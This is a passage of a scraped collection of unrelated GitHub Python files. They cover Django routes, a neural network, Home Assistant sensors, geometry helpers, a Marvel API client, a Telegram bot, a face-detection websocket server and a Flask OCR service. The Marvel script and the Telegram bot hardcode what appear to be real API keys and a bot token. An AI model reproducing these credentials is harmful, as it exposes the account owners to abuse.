[ent['path_display'] for ent in res['entries']]\n paths = [path for path in paths if '.tar.gz' in path]\n paths = sorted(paths)\n\n sys.stderr.write(\"Found {} files\\n\".format(len(paths)))\n for path in paths:\n sys.stderr.write(\"Downloading {}\\n\".format(path))\n download(os.environ['DROPBOX_TOKEN'], path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"belltailjp/wp-backup-dropbox","sub_path":"download_backup.py","file_name":"download_backup.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41450636961","text":"from django.urls import path\n\nfrom .views import ListBookView, AddBookView, DeleteBookView, AddAuthorView, ListAuthorView, DeleteAuthorView, UpdateAuthorView, UpdateBookView, HomePageView\n\nurlpatterns = [\n path('', HomePageView.as_view(), name='home'),\n path('list/book/', ListBookView.as_view(), name='list_book'),\n path('list/author/', ListAuthorView.as_view(), name='list_author'),\n path('add/book', AddBookView.as_view(), name='add_book'),\n path('add/author', AddAuthorView.as_view(), name='add_author'),\n path('delete/book/', DeleteBookView.as_view(), name='delete_book'),\n path('delete/author/', DeleteAuthorView.as_view(), name='delete_author'),\n path('update/book/', UpdateBookView.as_view(), name='edit_book'),\n path('update/author/', UpdateAuthorView.as_view(), name='edit_author'),\n] ","repo_name":"janpipan/Diploma","sub_path":"Test/DjangoApp/djangodatabase/books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1593504221","text":"from setuptools import setup\nwith open(\"README.md\", \"r\") as f:\n long_description = f.read()\nsetup(\n name=\"pypkg_builder\",\n version=\"1.0\",\n description=\"A simple tool for packaging python\",\n package_dir={\"\": \"src\"},\n include_package_data=True,\n url=\"https://github.com/dipson94/packagemaker\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Dipson\",\n classifiers=[\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Programming Language :: Python :: 3.10\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=['pyperclip','flask','datetime'],\n python_requires=\">=3.10\",\n entry_points={\n 'console_scripts': [\n 'pysetup=template_pypackage_builder.__init__:app.run',\n ],\n },\n)\n","repo_name":"dipson94/packagemaker","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19223737175","text":"import numpy as np\r\nfrom scipy.special import expit as sig\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom evaluator import calculate_metrics\r\nfrom load_weights import load_weight\r\n\r\n\r\nclass NET:\r\n\tdef __init__(self, weights=None, train_set=None, test_set=None, output_name=None, n_epochs=None, l_rate=None):\r\n\t\tself.train_set = train_set\r\n\t\tself.test_set = test_set\r\n\t\tself.weights = weights\r\n\t\tself.output_name = output_name\r\n\t\tself.n_epochs = n_epochs\r\n\t\tself.l_rate = l_rate\r\n\t\tself.n_inputs = None\r\n\t\tself.n_hidden = None\r\n\t\tself.n_output = None\r\n\t\tself.w1 = self.w2 = None\r\n\r\n\t\tself.a1 = self.a2 = self.a3 = None\r\n\t\tself.ins2 = self.ins3 = 
None\r\n\r\n\t\tself.load_initial_weights()\r\n\r\n\t\tif self.train_set is not None:\r\n\t\t\tself.X_train, self.y_train = self.get_data(self.train_set)\r\n\t\telse:\r\n\t\t\tself.X_train, self.y_train = None, None\r\n\r\n\t\tif self.test_set is not None:\r\n\t\t\tself.X_test, self.y_test = self.get_data(self.test_set)\r\n\t\telse:\r\n\t\t\tself.X_test, self.y_test = None, None\r\n\r\n\tdef get_data(self, file_name):\r\n\t\tdata = []\r\n\t\twith open(file_name, 'r') as file:\r\n\t\t\ttemp = file.readline().split()\r\n\t\t\tn_inputs = int(temp[1])\r\n\t\t\tn_outputs = int(temp[2])\r\n\r\n\t\t\tif n_inputs != self.n_inputs:\r\n\t\t\t\traise ValueError('Incorrect input dimensions.')\r\n\t\t\telif n_outputs != self.n_output:\r\n\t\t\t\traise ValueError('Incorrect output dimensions.')\r\n\r\n\t\t\tfor line in file:\r\n\t\t\t\tline = [float(i) for i in line.split()]\r\n\t\t\t\tdata = data + [line]\r\n\r\n\t\t\tx = np.asarray(data).T[:n_inputs].T\r\n\t\t\ty = np.asarray(data).T[n_inputs:].T\r\n\r\n\t\t\treturn x, y\r\n\t\treturn None, None\r\n\r\n\tdef forward_prop(self, x):\r\n\t\tif len(x.shape) != 2 or x.shape[1] != self.n_inputs:\r\n\t\t\traise ValueError('Incorrect input shape ' + str(x.shape) + ' given!')\r\n\t\telse:\r\n\t\t\tx = np.append(-np.ones((len(x), 1)), x, axis=1)\r\n\t\t\tself.a1 = x\r\n\t\t\tself.ins2 = np.matmul(self.a1, self.w1)\r\n\t\t\tself.a2 = sig(self.ins2)\r\n\t\t\tself.a2 = np.append(-np.ones((len(self.a2), 1)), self.a2, axis=1)\r\n\t\t\tself.ins3 = np.matmul(self.a2, self.w2)\r\n\t\t\tself.a3 = sig(self.ins3)\r\n\t\treturn self.a3\r\n\r\n\tdef load_initial_weights(self):\r\n\t\tself.n_inputs, self.n_hidden, self.n_output, self.w1, self.w2 = load_weight(self.weights)\r\n\r\n\tdef test_network(self):\r\n\t\toriginal_results = np.zeros((self.n_output, 4))\r\n\t\ty_hat = np.round(self.forward_prop(self.X_test), 0)\r\n\t\tfor ii in range(self.n_output):\r\n\t\t\toriginal_results[ii, :] = np.reshape(confusion_matrix(self.y_test[:, ii], y_hat[:, ii]), 4)\r\n\t\t\toriginal_results[ii, 0], original_results[ii, 3] = original_results[ii, 3], original_results[ii, 0]\r\n\r\n\t\toriginal_results = np.asarray(original_results, dtype=np.int32)\r\n\t\tacc, precision, recall, f1 = calculate_metrics(original_results)\r\n\r\n\t\tacc = np.expand_dims(acc, 0).T\r\n\t\tprecision = np.expand_dims(precision, 0).T\r\n\t\trecall = np.expand_dims(recall, 0).T\r\n\t\tf1 = np.expand_dims(f1, 0).T\r\n\r\n\t\tresults = np.concatenate((original_results, acc, precision, recall, f1), 1)\r\n\r\n\t\ttemp = np.average(results[:, 4:], axis=0)\r\n\t\ttemp[3] = 2 * temp[1] * temp[2] / (temp[1] + temp[2])\r\n\r\n\t\twith open(self.output_name, 'wb') as f:\r\n\t\t\tfor ii in range(results.shape[0]):\r\n\t\t\t\ttemp_str = '%d %d %d %d %0.3f %0.3f %0.3f %0.3f\\n' % tuple(results[ii, :])\r\n\t\t\t\tf.write(temp_str.encode('utf-8'))\r\n\t\t\ttemp_str = '%0.3f %0.3f %0.3f %0.3f\\n' % calculate_metrics(np.sum(original_results, axis=0, keepdims=True))\r\n\t\t\tf.write(temp_str.encode('utf-8'))\r\n\t\t\ttemp_str = '%0.3f %0.3f %0.3f %0.3f\\n' % tuple(temp)\r\n\t\t\tf.write(temp_str.encode('utf-8'))\r\n\r\n\t\t# Return value not used in most cases\r\n\t\treturn np.average(acc)\r\n\r\n\tdef train_network(self):\r\n\r\n\t\tfor _ in range(self.n_epochs):\r\n\t\t\tfor ii in range(len(self.X_train)):\r\n\t\t\t\ttemp_x = self.X_train[ii:ii + 1, :]\r\n\t\t\t\ttemp_y = self.y_train[ii:ii + 1, :]\r\n\t\t\t\tself.forward_prop(temp_x)\r\n\t\t\t\tdelta3 = dsig(self.ins3) * (temp_y - self.a3)\r\n\t\t\t\tdelta2 = dsig(self.ins2) * 
np.matmul(delta3, self.w2[1:, ].T)\r\n\t\t\t\tself.w2 += self.l_rate * np.matmul(self.a2.T, delta3)\r\n\t\t\t\tself.w1 += self.l_rate * np.matmul(self.a1.T, delta2)\r\n\r\n\t\twith open(self.output_name, 'wb') as f:\r\n\t\t\ttemp_str = '%d %d %d\\n' % (self.n_inputs, self.n_hidden, self.n_output)\r\n\t\t\tf.write(temp_str.encode('utf-8'))\r\n\r\n\t\t\tnp.savetxt(f, self.w1.T, '%0.3f', delimiter=' ')\r\n\r\n\t\t\tnp.savetxt(f, self.w2.T, '%0.3f', delimiter = ' ')\r\n\r\ndef dsig(x):\r\n\treturn sig(x) * (1 - sig(x))\r\n","repo_name":"seyunkim0114/AI_Project2","sub_path":"NeuralNet.py","file_name":"NeuralNet.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70537100404","text":"\"\"\"AsusRouter binary sensors.\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\n\n_LOGGER = logging.getLogger(__name__)\n\nfrom typing import Any\n\nfrom homeassistant.components.binary_sensor import (\n DEVICE_CLASS_CONNECTIVITY,\n BinarySensorEntity,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import EntityCategory\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\n\nfrom .const import DATA_ASUSROUTER, DOMAIN, KEY_COORDINATOR, SENSORS_TYPE_WAN\nfrom .dataclass import ARBinarySensorDescription\nfrom .router import AsusRouterObj\n\nBINARY_SENSORS = {\n (SENSORS_TYPE_WAN, \"status\"): ARBinarySensorDescription(\n key=\"status\",\n key_group=SENSORS_TYPE_WAN,\n name=\"WAN\",\n entity_category=EntityCategory.DIAGNOSTIC,\n device_class=DEVICE_CLASS_CONNECTIVITY,\n entity_registry_enabled_default=True,\n extra_state_attributes={\n \"dns\": \"dns\",\n \"gateway\": \"gateway\",\n \"ip\": \"ip\",\n \"ip_type\": \"ip_type\",\n \"mask\": \"mask\",\n \"private_subnet\": \"private_subnet\",\n },\n ),\n}\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Setup AsusRouter binary sensors.\"\"\"\n\n router: AsusRouterObj = hass.data[DOMAIN][entry.entry_id][DATA_ASUSROUTER]\n entities = []\n\n for sensor_data in router._sensors_coordinator.values():\n coordinator = sensor_data[KEY_COORDINATOR]\n for sensor_description in BINARY_SENSORS:\n try:\n if sensor_description[0] in sensor_data:\n if (\n BINARY_SENSORS[sensor_description].key\n in sensor_data[sensor_description[0]]\n ):\n entities.append(\n ARBinarySensor(\n coordinator, router, BINARY_SENSORS[sensor_description]\n )\n )\n except Exception as ex:\n _LOGGER.warning(ex)\n\n async_add_entities(entities, True)\n\n\nclass ARBinarySensor(CoordinatorEntity, BinarySensorEntity):\n \"\"\"AsusRouter binary sensor.\"\"\"\n\n def __init__(\n self,\n coordinator: DataUpdateCoordinator,\n router: AsusRouterObj,\n description: ARBinarySensorDescription,\n ) -> None:\n \"\"\"Initialize AsusRouter binary sensor.\"\"\"\n\n super().__init__(coordinator)\n self.entity_description: ARBinarySensorDescription = description\n self.router = router\n self.coordinator = coordinator\n\n self._attr_name = f\"{router._name} {description.name}\"\n self._attr_unique_id = f\"{DOMAIN} {self.name}\"\n self._attr_device_info = router.device_info\n\n @property\n def is_on(self) -> bool:\n \"\"\"Return state.\"\"\"\n\n return self.coordinator.data.get(self.entity_description.key)\n\n 
@property\n def extra_state_attributes(self) -> dict[str, Any]:\n \"\"\"Return extra state attributes.\"\"\"\n\n description = self.entity_description\n _attributes = description.extra_state_attributes\n if not _attributes:\n return {}\n\n attributes = {}\n\n for attr in _attributes:\n if attr in self.coordinator.data:\n attributes[_attributes[attr]] = self.coordinator.data[attr]\n\n return attributes\n","repo_name":"bittles/hassio_config_and_addons","sub_path":"config/custom_components/asusrouter/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"13481230077","text":"from matplotlib import pyplot as plt\nimport matplotlib.cm as cm\nfrom scipy import spatial\n\nSMALL_SIZE = 8\nMEDIUM_SIZE = 10\nBIGGER_SIZE = 12\n\n# adjust font sizes (https://stackoverflow.com/questions/3899980/how-to-change-the-font-size-on-a-matplotlib-plot)\nplt.rc('font', size=BIGGER_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=BIGGER_SIZE) \t# fontsize of the x and y labels\nplt.rc('xtick', labelsize=BIGGER_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=BIGGER_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=BIGGER_SIZE) # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE) \t# fontsize of the figure title\n\ndef visualizeHeatPC(scan, gt):\n\tfig = plt.figure(figsize=(5, 5))\n\tax = fig.add_subplot(111, projection=\"3d\")\n\tgtKDTree = spatial.KDTree(gt)\n\tdistances, indexes = gtKDTree.query(scan)\n\tax.scatter(scan[:, 0], scan[:, 1], scan[:, 2], c=distances, cmap=cm.jet)\n\tplt.show()\n\ndef visualizeOnePC(pc, filename=\"prediction\", axisOff=True):\n\tfig = plt.figure(figsize=(10, 10))\n\tax = fig.add_subplot(111, projection=\"3d\")\n\tax.scatter(pc[:, 0], pc[:, 1], pc[:, 2])\n\tif axisOff:\n\t\tax.set_axis_off()\n\tplt.savefig(f\"{filename}.png\")\n\tplt.show()\n\ndef visualizeTwoPCs(scan, gt):\n\tfig = plt.figure(figsize=(5, 5))\n\tax = fig.add_subplot(111, projection=\"3d\")\n\tax.set_title(\"scan\")\n\tax.scatter(scan[:, 0], scan[:, 1], scan[:, 2])\n\tfig2 = plt.figure(figsize=(5, 5))\n\tax2 = fig2.add_subplot(111, projection=\"3d\")\n\tax2.set_title(\"ground truth\")\n\tax2.scatter(gt[:, 0], gt[:, 1], gt[:, 2])\n\tplt.show()\n\ndef visualizePredictions(train, gt, pred):\n\tfig = plt.figure(figsize=(15, 10))\n\tfor i in range(len(pred)):\n\t\tax = fig.add_subplot(3, len(pred), i + 1, projection=\"3d\")\n\t\tax.scatter(train[i, :, 0], train[i, :, 1], train[i, :, 2])\n\t\tax.set_axis_off()\n\t\tax = fig.add_subplot(3, len(pred), (i + 1) + len(pred), projection=\"3d\")\n\t\tax.scatter(gt[i, :, 0], gt[i, :, 1], gt[i, :, 2])\n\t\tax.set_axis_off()\n\t\tax = fig.add_subplot(3, len(pred), (i + 1) + 2 * len(pred), projection=\"3d\")\n\t\tax.scatter(pred[i, :, 0], pred[i, :, 1], pred[i, :, 2])\n\t\tax.set_axis_off()\n\tplt.savefig(\"predictions.png\")\n\tplt.show()\n\ndef visualizeHistory(history, loss_only: bool = False, title=\"Model Loss\"):\n\tplt.figure(figsize=(10, 5))\n\tplt.plot(history.history['loss'])\n\tif not loss_only:\n\t\tplt.plot(history.history['val_loss'])\n\tif title is not None:\n\t\tplt.title(title)\n\tplt.ylabel('Loss')\n\tplt.xlabel('Epoch')\n\tplt.legend(['Training', 'Validation'], loc='upper 
right')\n\tplt.savefig(\"history.png\")\n\tplt.show()\n","repo_name":"Ashen-MG/web-app-for-3d-processing","sub_path":"sharp/utils/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"7571031083","text":"'''\ngeometry.py\nContains analytical geometry functions to compute line slope, \ndistance between points, line intercepts, and line intersections.\n'''\n\nfrom math import sqrt, fabs\n\n# Python 3.5 has math.inf, but 3.4 does not\nfrom sys import version_info\nif version_info.major == 3 and version_info.minor >= 5:\n    from math import inf\nelse:\n    inf = float(\"inf\")\n\n\ndef floatequals(a, b):\n    '''\n    Returns True if the floating-point values a and b are\n    close enough in value to be considered equal; otherwise,\n    the function returns False. 
The parameters are considered\n    equal when they are within 0.001 of each other.\n    '''\n    return a == b or fabs(a - b) < 0.001\n\n\ndef distance(x1, y1, x2, y2):\n    '''\n    Computes the distance between the points (x1,y1) and (x2,y2),\n    where x1, y1, x2, and y2 are numbers.\n    '''\n    return sqrt(((x2-x1)**2)+((y2-y1)**2))\n\n\ndef slope(x1, y1, x2, y2):\n    '''\n    Computes the slope of the line that passes through the points \n    (x1,y1) and (x2,y2). The function returns math.inf if a vertical \n    line passes through the two points. The function's behavior is\n    undefined if the two points are identical. \n    x1, y1, x2, and y2 are numbers.\n    '''\n    if (x2-x1) == 0:\n        return inf\n    else:\n        return (y2-y1)/(x2-x1)\n\n\ndef intercept(x1, y1, x2, y2):\n    '''\n    Computes the y-intercept of the non-vertical line that \n    passes through the points (x1,y1) and (x2,y2). The \n    function returns the x-intercept if the line is vertical. \n    Two identical points are interpreted to be on a \n    vertical line.\n    '''\n    if x1 == x2:\n        return x1\n    else:\n        return y1-slope(x1, y1, x2, y2)*x1\n\n\ndef lineequation(x1, y1, x2, y2):\n    '''\n    Returns a string representation of a line passing through the points\n    (x1,y1) and (x2,y2). The result is in the form y = mx + b for \n    non-vertical lines and x = b for vertical lines. The representation\n    is as simple as possible; e.g., \n         y = 3x - 2     not     y = 3x + -2\n         y = x + 3      not     y = 1x + 3\n         y = 5          not     y = 0x + 5\n         x = 4          a vertical line\n    '''\n    inter = intercept(x1, y1, x2, y2)\n    slpe = slope(x1, y1, x2, y2)\n    if inter < 0:\n        sym = \" - \"\n        pinter = abs(inter)\n    else:\n        sym = \" + \"\n        pinter = inter\n    if slpe == inf:\n        return \"x = \" + str(x1)\n    elif slpe == 0:\n        return \"y = \" + str(inter)\n    elif slpe == 1 and inter == 0:\n        return \"y = \" + \"x\"\n    elif slpe == 1:\n        return \"y = \" + \"x\" + sym + str(pinter)\n    elif inter == 0:\n        return \"y = \" + str(slpe) + \"x\"\n    else:\n        return \"y = \" + str(slpe) + \"x\" + sym + str(pinter)\n\ndef intersection(m1, b1, m2, b2):\n    '''\n    Computes the (i_x, i_y) intersection point of the lines \n    y = m1x + b1 and y = m2x + b2. Returns None if the lines \n    do not intersect in a single point.\n    '''\n    if m1 == m2:\n        return None\n    elif m1 != inf and m2 != inf:\n        xv = (b2 - b1) / (m1 - m2)\n        yv = (m1 * xv) + b1\n        return (xv, yv)\n    elif m1 == inf:\n        xv = b1\n        yv = (m2 * xv) + b2\n        return (xv, yv)\n    elif m2 == inf:\n        xv = b2\n        yv = (m1 * xv) + b1\n        return (xv, yv)\n\n\n\n\nif __name__ == '__main__':\n    pass\n\n","repo_name":"NobleWolf42/Python101","sub_path":"Ben Labs/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"34601227078","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct  9 23:06:51 2022\n\n@author: javi\n\"\"\"\nimport numpy as np\nfrom joblib import Parallel, delayed\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import check_cv\nfrom sklearn.utils import check_X_y\nfrom sklearn.ensemble._base import _fit_single_estimator\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.base import TransformerMixin, is_classifier, is_regressor, clone\nfrom sklearn.utils.validation import check_is_fitted\n\nfrom my_sklearn_tools.model_selection import check_cv\n\n\nclass ColPredTransform(TransformerMixin):\n    \"\"\"Columnwise transformer with predictions. 
\n    \n    Each column is replaced with the cross-validated predictions by means of\n    a linear regression.\n    \n    Parameters\n    ----------\n    \n    cv : int, cross-validation generator or iterable, default=None\n        Determines the cross-validation splitting strategy.\n        Possible inputs for cv are:\n        \n        - None, to use the default 5-fold cross-validation,\n        - int, to specify the number of folds.\n        - :term:`CV splitter`,\n        - An iterable yielding (train, test) splits as arrays of indices.\n        For int/None inputs, :class:`KFold` is used.\n        Refer :ref:`User Guide ` for the various\n        cross-validation strategies that can be used here.\n\n    \n    verbose : bool or int, default=False\n        Amount of verbosity.\n    \n    n_jobs : int, default=None\n        Number of CPUs to use during the cross validation.\n        ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n        ``-1`` means using all processors. \"\"\"\n\n    \n    def __init__(self, cv=None, n_jobs=-1, verbose=0):\n        self.cv = cv\n        self.n_jobs = n_jobs\n        self.verbose = verbose\n\n    def fit(self, X, y):\n\n        # Checkings here\n        X, y = check_X_y(X, y)\n\n        self.n_features_ = X.shape[1]\n        \n        fitted_estims = Parallel(n_jobs=self.n_jobs)(\n            delayed(_fit_single_estimator)(clone(LinearRegression()),\n                                           x[:,None],\n                                           y) for x in X.T\n            )\n        self.estimators_ = fitted_estims\n        \n        return self\n\n    def transform(self, X):\n\n        check_is_fitted(self)\n\n        preds = [\n            getattr(est, \"predict\")(x[:, None])\n            for x, est in zip(X.T, self.estimators_)\n        ]\n        return np.column_stack(preds)\n\n    def fit_transform(self, X, y):\n\n        self.fit(X, y)\n\n        cv = check_cv(self.cv, y, classifier=False)\n        \n        preds = Parallel(n_jobs=self.n_jobs)(\n            delayed(cross_val_predict)(LinearRegression(),\n                                       x[:, None],\n                                       y,\n                                       cv=cv,\n                                       n_jobs=self.n_jobs,\n                                       verbose=self.verbose) \n            for x in X.T)\n        \n        return np.column_stack(preds)\n","repo_name":"jrasero/my-scikit-tools","sub_path":"my_sklearn_tools/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2081370615","text":"#activity 2\r\n\r\nimport requests\r\nimport hashlib\r\nimport json\r\nimport pandas as pd\r\n#importing libs\r\n\r\n\r\n#defining keys and address\r\n\r\npublic_key='345207a1e6e10efb9acd4a5fceee4829'\r\nprivate_key='08291be565ab98547bc23d1fe1e9e44b789aa3d3'\r\nts=1\r\nhash= hashlib.md5((str(ts)+private_key+public_key).encode()).hexdigest()\r\naddress = 'https://gateway.marvel.com:443/v1/public/characters'\r\n\r\n#defining parameters\r\n\r\nparameters = {\r\n    \"apikey\": public_key,\r\n    \"ts\": ts,\r\n    \"hash\": hash\r\n}\r\n\r\nresponse =requests.get(address, params=parameters)\r\nresults = response.json()\r\nprint(json.dumps(results))\r\n#first api call\r\n\r\n#fetch all the characters by a for loop\r\n\r\nfrom string import ascii_lowercase\r\n\r\n\r\ncharecters_df =pd.DataFrame()\r\n\r\nfor ch in list(ascii_lowercase):\r\n    parameters={'ts':1,'apikey':public_key, 'hash':hash,'limit':100, 'nameStartsWith':ch}\r\n    response =requests.get(address, params=parameters)\r\n    results = response.json()\r\n    df=pd.json_normalize(results['data']['results'])\r\n    df =df[['id','name','comics.available','events.available','stories.available','series.available']]\r\n    charecters_df=charecters_df.append(df)","repo_name":"LohithN10/IBM-Data-Science-","sub_path":"activity2new (1).py","file_name":"activity2new 
(1).py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24891376252","text":"import os\nimport shutil\n\nfrom PIL import Image, ImageDraw, ImageFont\nfrom flask import Flask\nfrom flask_restful import Resource, Api, reqparse, request\nimport easyocr\nimport requests\n\napp = Flask(__name__, static_url_path='/static')\napi = Api(app)\n\nparser = reqparse.RequestParser()\nparser.add_argument('file')\nparser.add_argument('image_url')\nparser.add_argument('image_type')\n\n\ndef download_image(url, file_name):\n full_path = app.root_path + '/' + file_name\n res = requests.get(url, stream=True)\n if res.status_code == 200:\n with open(file_name, 'wb') as f:\n shutil.copyfileobj(res.raw, f)\n print('Image sucessfully Downloaded: ', full_path)\n else:\n print('Image Couldn\\'t be retrieved')\n return app.root_path, file_name\n\n\ndef detect_captcha(url):\n reader = easyocr.Reader(['en', 'en'])\n result = reader.readtext(url)\n return result[0][1]\n\n\ndef convert_gif_to_png(url, file_name):\n print('gif ', url)\n image_name = \"captcha.png\"\n gif_path = url + '/' + file_name\n convert_path = os.path.join(url, image_name)\n img = Image.open(gif_path)\n img.save(convert_path, 'png', optimize=True, quality=70)\n return convert_path\n\n\nclass FILE(Resource):\n\n def post(self):\n file_data = request.files['file']\n print(request)\n try:\n image_path = os.path.join(app.root_path, 'image_file.png')\n file_data.save(image_path)\n response_number = detect_captcha(image_path)\n return {\n \"code\": response_number\n }\n except ValueError:\n return {\n \"code\": \"error\"\n }\n\n\nclass URL(Resource):\n\n def post(self):\n json_data = request.json\n imageURL = json_data['image_url']\n imageType = json_data['image_type']\n print(json_data)\n print(imageURL)\n print(imageType)\n try:\n if imageType != 'gif':\n response_number = detect_captcha(imageURL)\n return {\n \"code\": response_number\n }\n else:\n full_path, file_name = download_image(imageURL, 'image.gif')\n print(full_path)\n convert_image_path = convert_gif_to_png(full_path, file_name)\n print('convert ', convert_image_path)\n response_number = detect_captcha(convert_image_path)\n return {\n \"code\": response_number\n }\n except ValueError:\n return {\n \"code\": \"error\"\n }\n\n\napi.add_resource(FILE, '/ocr/file')\napi.add_resource(URL, '/ocr/url')\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"minhdatplus/restful-ocr","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15883669152","text":"#https://api.telegram.org/bot853533585:AAHi7W-NeNanfTbmnsA1P5ld23Gj7zx0iLo/sendmessage?chat_id=633737114&text=salaam\nimport requests\nimport telebot\nimport time \nbot_token = '853533585:AAHi7W-NeNanfTbmnsA1P5ld23Gj7zx0iLo'\n'''\ndef telegram_bot_sendtext(bot_message):\n \n \n bot_chatID = '633737114'\n send_text = 'https://api.telegram.org/bot' + bot_token + '/sendMessage?chat_id=' + bot_chatID + '&parse_mode=Markdown&text=' + bot_message +\"&disable_notification=True\"\n\n response = requests.get(send_text)\n\n return response.json()\ntest = telegram_bot_sendtext(\"Thi mehsun\")\nprint(test)\n'''\nbot = telebot.TeleBot(token = bot_token)\n\n@bot.message_handler(commands = [\"start\"])\ndef welcomemsg(message):\n\tbot.reply_to(message,\"welcome!\")\n\n\nwhile True:\n\ttry:\n\t\tbot.polling()\n\texcept 
Exception:\n\t\ttime.sleep(1)\n\t\n\n\n\n\n","repo_name":"MehdiMhmvd/Exercises","sub_path":"bot_communication.py","file_name":"bot_communication.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2684863967","text":"import ssl\nimport threading\nimport os\nimport asyncio\nimport json\nimport websockets\nimport cv2\nimport base64\nimport base64\nimport numpy as np\nimport argparse\n\nfrom mtcnn import MTCNN\n\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--port\", required=True, help=\"sayi giriniz\")\nargs = vars(ap.parse_args())\ndetector = MTCNN()\n\n\nasync def time(websocket, path):\n while True:\n print(\"Sending\")\n try:\n x = await asyncio.wait_for(websocket.recv(), timeout=3)\n print(x)\n except asyncio.TimeoutError:\n os.kill(os.getpid(), 9)\n print(\"errorrrrr\")\n # x = await websocket.recv()\n try:\n x = json.loads(x)\n img_str = str(x['data'].split(',')[1])\n img = base64.b64decode(img_str)\n jpg_as_np = np.frombuffer(img, dtype=np.uint8)\n\n img = cv2.imdecode(jpg_as_np, flags=1)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n faces = detector.detect_faces(img)\n await websocket.send(json.dumps(faces))\n except Exception as e:\n print(e)\n print(\"errorrrrr\")\n os.kill(os.getpid(), 9)\n pass\n\n\ndef between_callback():\n\n ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n ssl_context.load_cert_chain(\n './cert.pem', './key.pem')\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n ws_server = websockets.serve(\n time, os.getenv(\"SERVER_HOST\"), args[\"port\"], ssl=ssl_context)\n\n loop.run_until_complete(ws_server)\n loop.run_forever() # this is missing\n\n\nif __name__ == \"__main__\":\n # daemon server thread:\n server = threading.Thread(target=between_callback, daemon=True)\n server.start()\n","repo_name":"enescanguven/vunga","sub_path":"websocket/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"9668246694","text":"\"\"\"\n!! WORK IN PROGRESS !!\n\nDetect tennis courts from aerial satellite images using a trained HAAR or LBP\nclassification model.\n\nXML file with model parameters derived from the following excellent tool:\n- https://amin-ahmadi.com/cascade-trainer-gui/6\nSome cv2 code sourced from:\n- https://www.geeksforgeeks.org/detect-an-object-with-opencv-python/\n\"\"\"\n\nfrom markup import label_court\nfrom transformations import rotate_image\n\nimport cv2\nfrom matplotlib import pyplot as plt\n\n# Constants\nMIN_SIZE_DETECTED = 70 # Objects with height or width smaller than this are ignored\nMIN_NEIGHBOURS = 5 # Num neighbors each candidate rect should have to retain\nSCALE_FACTOR = 1.1 # Greater scale reduces propensity for positives. 
